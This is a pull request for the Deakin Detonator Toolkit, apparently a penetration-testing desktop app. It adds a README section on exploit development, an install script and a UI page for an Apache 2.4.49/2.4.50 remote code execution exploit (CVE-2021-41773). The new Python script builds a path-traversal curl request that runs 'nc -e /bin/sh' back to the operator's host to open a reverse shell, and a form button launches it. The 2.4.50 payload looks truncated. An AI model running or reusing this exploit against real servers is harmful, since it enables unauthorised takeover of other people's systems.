### PR TITLE
feature: add CVE-2021-41773 as attack vector

### DIFF
--- a/README.md
+++ b/README.md
@@ -1,11 +1,28 @@
-# DDT PoC
+# 🧰 Deakin Detonator Toolkit
 
-This repo houses a proof of concept UI for the DDT application built with Modern Web technologies, shipping as a native desktop application.
+This repo houses the new version of the Deakin Detonator Toolkit application built with Modern Web technologies, shipping as a native desktop application.
 
 -   UI built with [Mantine](https://mantine.dev), [ReactJS](https://reactjs.org/) and [TypeScript](https://www.typescriptlang.org/).
 -   Shipped as desktop client via [Tauri](https://tauri.app/).
 
-# Setup
+`src/` contains the source code for the UI.
+`src-tauri` contains the source code and configuration for the Tauri application.
+
+# 🛠️ Exploit Development
+
+All exploit scripts are expected to live in `/usr/share/ddt/`, and they will be executed by the Tauri application. It is recommended that you use Python for exploit development.
+
+For the exploit scripts, it is important to ensure they are executable entirely with command line arguments, eg. `python3 my_exploit.py <ip> <port>`. This will simplify the integration of the exploit into the Tauri application.
+
+`install_exploits.sh` is a helper script that will install all the exploit scripts in the `/usr/share/ddt/` directory. If you add new exploits, be sure to run this command again.
+
+```bash
+./install_exploits.sh
+```
+
+The `.deb` that Tauri builds will automatically do this for us for actual toolkit installation.
+
+# 🔧 Setup
 
 Steps 1-4 install the pre-requisites for Tauri. If more information is needed for steps 1-4, follow the Tauri pre-requisites installation guide [here](https://tauri.app/v1/guides/getting-started/prerequisites).
 
@@ -77,12 +94,18 @@ Steps 1-4 install the pre-requisites for Tauri. If more information is needed fo
     $ yarn install
     ```
 
-12. Run the application in dev mode, this will hot-reload upon changes made to the code:
+12. Install the exploits to the correct location.
+
+    ```bash
+    $ ./install_exploits.sh
+    ```
+
+13. Run the application in dev mode, this will hot-reload upon changes made to the code:
 
     ```bash
     $ yarn run tauri dev
     ```
 
-# Screenshot
+# 📷 Screenshot
 
 ![screenshot](https://i.imgur.com/Nu67H6n.png)

--- a/install_exploits.sh
+++ b/install_exploits.sh
@@ -1,0 +1,8 @@
+#!/usr/bin/env bash
+
+echo "Copying exploit files to /usr/share/ddt/"
+
+sudo mkdir -p /usr/share/ddt/
+sudo cp -r src-tauri/exploits/* /usr/share/ddt/
+
+echo "Success"

--- a/src-tauri/exploits/cve-2021-41773.py
+++ b/src-tauri/exploits/cve-2021-41773.py
@@ -1,0 +1,52 @@
+import sys, getopt, os
+
+parameter_list = sys.argv[1:]
+options = "hi:p:v:q:w:"
+long_options = ["Help", "Host IP", "Host Port", "Victim IP", "Victim Port", "Version"]
+
+ip_host = ''
+port_host = ''
+ip_victim = ''
+port_victim = ''
+version = ''
+
+try:
+    opts, args = getopt.getopt(parameter_list, options, long_options)
+except getopt.GetoptError:
+    print ("Follow instructions below: ")
+    print ('linearg.py -i <ip_host> -p <port_host> -v <ip_victim> -q <port_victim> -w <version>') 
+    sys.exit(5)
+for opt, arg in opts:
+    if opt == '-h':
+        print ('linearg.py -i <ip_host> -p <port_host> -v <ip_victim> -q <port_victim> -w <version>') 
+        sys.exit()
+    elif opt in ("-i", "--iphost"):
+        ip_host = arg
+    elif opt in ("-p", "--porthost"):
+        port_host = arg
+    elif opt in ("-v", "--ipvictim"):
+        ip_victim = arg
+    elif opt in ("-q", "--portvictim"):
+        port_victim = arg
+    elif opt in ("-w", "--vers"):
+        version = arg
+
+print ('Host IP: ', ip_host)
+print ('Host Port: ', port_host)
+print ('Victim IP: ', ip_victim)
+print ('Victim Port: ', port_victim)
+print ('OS Version: ', version)
+
+if (version == "2.4.49"):
+    print("Building RCE exploit for Apache Version 2.4.49")
+    cmd = "curl -v 'http://{}:{}/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/bash' -d 'echo Content-Type: text/plain; echo; nc -e /bin/sh {} {}'".format(
+        ip_victim, port_victim, ip_host, port_host)
+
+# 2.4.50
+if (version == "2.4.50"):
+    print("Building RCE exploit for Apache Version 2.4.50")
+    cmd = "curl -v 'http://{}:{}/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%6/bin/bash' -d 'echo Content-Type: text/plain; echo; nc -e /bin/sh {} {}'".format(
+        ip_victim, port_victim, ip_host, port_host)
+
+os.system(cmd)
+print("Successfully exploited, please check your listener for shell")

--- a/src-tauri/tauri.conf.json
+++ b/src-tauri/tauri.conf.json
@@ -7,7 +7,7 @@
     "distDir": "../dist"
   },
   "package": {
-    "productName": "capstone",
+    "productName": "ddt",
     "version": "0.1.0"
   },
   "tauri": {
@@ -26,6 +26,11 @@
             "name": "snmp-check",
             "cmd": "snmp-check",
             "args": true
+          },
+          {
+            "name": "python3",
+            "cmd": "python3",
+            "args": true
           }
         ]
       }
@@ -35,7 +40,11 @@
       "category": "DeveloperTool",
       "copyright": "",
       "deb": {
-        "depends": []
+        "depends": [],
+         "files": { 
+          "/usr/share/ddt": "../exploits/",
+          "/usr/share/doc/ddt/README.md": "../README.md"
+        }
       },
       "externalBin": [],
       "icon": [

--- a/src/App.tsx
+++ b/src/App.tsx
@@ -11,12 +11,14 @@ import {
     useMantineTheme,
 } from "@mantine/core";
 import { useState } from "react";
-import { BrowserRouter, Route, Routes } from "react-router-dom";
+import { Route, Routes } from "react-router-dom";
 import "./App.css";
+import { CVE202141773 } from "./components/CVE-2021-41773/CVE-2021-41773";
 import Navigation from "./components/NavBar/Navigation";
 import NmapTool from "./components/NmapTool/NmapTool";
 import SnmpCheck from "./components/SmnpCheck/SmnpCheck";
 import AboutPage from "./pages/About";
+import { AttackVectors } from "./pages/AttackVectors";
 import ToolsPage from "./pages/Tools";
 
 export default function App() {
@@ -67,6 +69,8 @@ export default function App() {
                             <Route path="/tools" element={<ToolsPage />} />
                             <Route path="/tools/nmap" element={<NmapTool />} />
                             <Route path="/tools/snmp-check" element={<SnmpCheck />} />
+                            <Route path="/attack-vectors" element={<AttackVectors />} />
+                            <Route path="/attack-vectors/cve-2021-41773" element={<CVE202141773 />} />
                         </Routes>
                     </AppShell>
                 </MantineProvider>

--- a/src/components/CVE-2021-41773/CVE-2021-41773.tsx
+++ b/src/components/CVE-2021-41773/CVE-2021-41773.tsx
@@ -1,0 +1,82 @@
+import { Button, LoadingOverlay, NativeSelect, NumberInput, Stack, TextInput, Title } from "@mantine/core";
+import { useForm } from "@mantine/form";
+import { useCallback, useState } from "react";
+import { CommandHelper } from "../../utils/CommandHelper";
+import ConsoleWrapper from "../ConsoleWrapper/ConsoleWrapper";
+
+interface FormValues {
+    hostIP: string;
+    targetIP: string;
+    hostPort: number;
+    targetPort: number;
+    version: string;
+}
+
+export function CVE202141773() {
+    const [loading, setLoading] = useState(false);
+    const [output, setOutput] = useState("");
+    const [selectedVersion, setSelectedVersion] = useState("2.4.49");
+
+    let form = useForm({
+        initialValues: {
+            hostIP: "",
+            targetIP: "",
+            hostPort: 4444,
+            targetPort: 80,
+            version: "",
+        },
+    });
+
+    const onSubmit = async (values: FormValues) => {
+        setLoading(true);
+
+        const args = [
+            "/usr/share/ddt/cve-2021-41773.py",
+            "-i",
+            values.hostIP,
+            "-p",
+            `${values.hostPort}`,
+            "-v",
+            values.targetIP,
+            "-q",
+            `${values.targetPort}`,
+            "-w",
+            values.version,
+        ];
+        const output = await CommandHelper.runCommand("python3", args);
+
+        setOutput(output);
+        setLoading(false);
+    };
+
+    const clearOutput = useCallback(() => {
+        setOutput("");
+    }, [setOutput]);
+
+    return (
+        <form onSubmit={form.onSubmit((values) => onSubmit({ ...values, version: selectedVersion }))}>
+            <LoadingOverlay visible={loading} />
+            <Stack>
+                <Title>Apache 2.4.49/2.4.50 RCE (CVE-2021-41773)</Title>
+                <TextInput
+                    label={"Host IP (your machine, for the reverse shell)"}
+                    required
+                    {...form.getInputProps("hostIP")}
+                />
+                <NumberInput label={"Host port (for reverse shell)"} {...form.getInputProps("hostPort")} />
+                <TextInput label={"Target IP or Hostname"} required {...form.getInputProps("targetIP")} />
+                <NumberInput label={"Target port"} required {...form.getInputProps("targetPort")} />
+                <NativeSelect
+                    value={selectedVersion}
+                    onChange={(e) => setSelectedVersion(e.target.value)}
+                    title={"Scan option"}
+                    data={["2.4.49", "2.4.50"]}
+                    required
+                    label={"Pick an apache version"}
+                />
+                <Button type={"submit"}>Exploit</Button>
+                <ConsoleWrapper output={output} clearOutputCallback={clearOutput} />
+            </Stack>
+        </form>
+    );
+}

--- a/src/components/NavBar/MainLinks.tsx
+++ b/src/components/NavBar/MainLinks.tsx
@@ -1,5 +1,5 @@
 import { Group, Text, ThemeIcon, UnstyledButton } from "@mantine/core";
-import { IconQuestionMark, IconStepInto, IconTools } from "@tabler/icons";
+import { IconQuestionMark, IconStepInto, IconTools, IconWaveSawTool } from "@tabler/icons";
 import React, { useState } from "react";
 import { Link } from "react-router-dom";
 
@@ -43,7 +43,16 @@ const aboutData = {
     label: "About",
     route: "/about",
 };
+
 const toolsData = { icon: <IconTools size={16} />, color: "violet", label: "Tools", route: "/tools" };
+
+const attackVectorsData = {
+    icon: <IconWaveSawTool size={16} />,
+    color: "red",
+    label: "Attack Vectors",
+    route: "/attack-vectors",
+};
+
 const walkthroughsData = {
     icon: <IconStepInto size={16} />,
     color: "blue",
@@ -52,7 +61,7 @@ const walkthroughsData = {
 };
 
 export function MainLinks() {
-    const [data, setData] = useState<MainLinkProps[]>([aboutData, toolsData, walkthroughsData]);
+    const [data, setData] = useState<MainLinkProps[]>([aboutData, toolsData, attackVectorsData, walkthroughsData]);
     const links = data.map((link) => <MainLink {...link} key={link.label} />);
     return <div>{links}</div>;
 }

--- a/src/components/NmapTool/NmapTool.tsx
+++ b/src/components/NmapTool/NmapTool.tsx
@@ -27,6 +27,8 @@ const scanOptions = [
 const NmapTool = () => {
     const [loading, setLoading] = useState(false);
     const [output, setOutput] = useState("");
+    const [selectedScanOption, setSelectedScanOption] = useState("");
+    const [selectedSpeedOption, setSelectedSpeedOption] = useState("");
 
     let form = useForm({
         initialValues: {
@@ -64,8 +66,12 @@ const NmapTool = () => {
 
         args.push(values.ip);
 
-        const output = await CommandHelper.runCommand("nmap", args);
-        setOutput(output);
+        try {
+            const output = await CommandHelper.runCommand("nmap", args);
+            setOutput(output);
+        } catch (e: any) {
+            setOutput(e);
+        }
 
         setLoading(false);
     };
@@ -75,10 +81,14 @@ const NmapTool = () => {
     }, [setOutput]);
 
     // Determine if the current scan options are for the top ports.
-    const isTopPortScan = form.values.scanOption === "Top ports";
+    const isTopPortScan = selectedScanOption === "Top ports";
 
     return (
-        <form onSubmit={form.onSubmit((values) => onSubmit(values))}>
+        <form
+            onSubmit={form.onSubmit((values) =>
+                onSubmit({ ...values, scanOption: selectedScanOption, speed: selectedSpeedOption })
+            )}
+        >
             <LoadingOverlay visible={loading} />
             <Stack>
                 <Title>Network port scanner (NMAP)</Title>
@@ -86,20 +96,22 @@ const NmapTool = () => {
                 {!isTopPortScan && <TextInput label={"Port"} {...form.getInputProps("port")} />}
                 {isTopPortScan && <NumberInput label={"Number of top ports"} {...form.getInputProps("numTopPorts")} />}
                 <NativeSelect
+                    value={selectedSpeedOption}
+                    onChange={(e) => setSelectedSpeedOption(e.target.value)}
                     title={"Scan speed"}
                     data={speeds}
                     required
                     placeholder={"Pick a scan speed"}
                     description={"Speed of the scan, refer: https://nmap.org/book/performance-timing-templates.html"}
-                    {...form.getInputProps("speed")}
                 />
                 <NativeSelect
+                    value={selectedScanOption}
+                    onChange={(e) => setSelectedScanOption(e.target.value)}
                     title={"Scan option"}
                     data={scanOptions}
                     required
                     placeholder={"Pick a scan option"}
                     description={"Type of scan to perform"}
-                    {...form.getInputProps("scanOption")}
                 />
                 <Button type={"submit"}>Scan</Button>
                 <ConsoleWrapper output={output} clearOutputCallback={clearOutput} />

--- a/src/pages/AttackVectors.tsx
+++ b/src/pages/AttackVectors.tsx
@@ -1,0 +1,32 @@
+import { Stack, Table, Title } from "@mantine/core";
+import ToolItem from "../components/ToolItem/ToolItem";
+
+const VECTORS = [
+    {
+        title: "CVE 2021-41773",
+        description: "Apache 2.4.49 and 2.4.50 RCE",
+        route: "/attack-vectors/cve-2021-41773",
+    },
+];
+
+export function AttackVectors() {
+    const rows = VECTORS.map((tool) => {
+        return <ToolItem title={tool.title} description={tool.description} route={tool.route} key={tool.title} />;
+    });
+
+    return (
+        <Stack align={"center"}>
+            <Title>Attack Vectors</Title>
+            <Table horizontalSpacing="xl" verticalSpacing="md" fontSize="md">
+                <thead>
+                    <tr>
+                        <th>Attack Vector name</th>
+                        <th>Atack description</th>
+                        <th>Controls</th>
+                    </tr>
+                </thead>
+                <tbody>{rows}</tbody>
+            </Table>
+        </Stack>
+    );
+}


### PR DESCRIPTION
Thanks to @zinchenkoboris for his work converting the exploit script to command line runnable

This PR: 
- fixes the `NativeSelect` on the `nmap` tool
- adds more information about the project structure to the README
- created the attack vectors page
- implements CVE-2021-41773 as an attack vector, executing the python exploit script from Tauri, providing a strong foundation and procedure for implementing further exploits to the toolkit.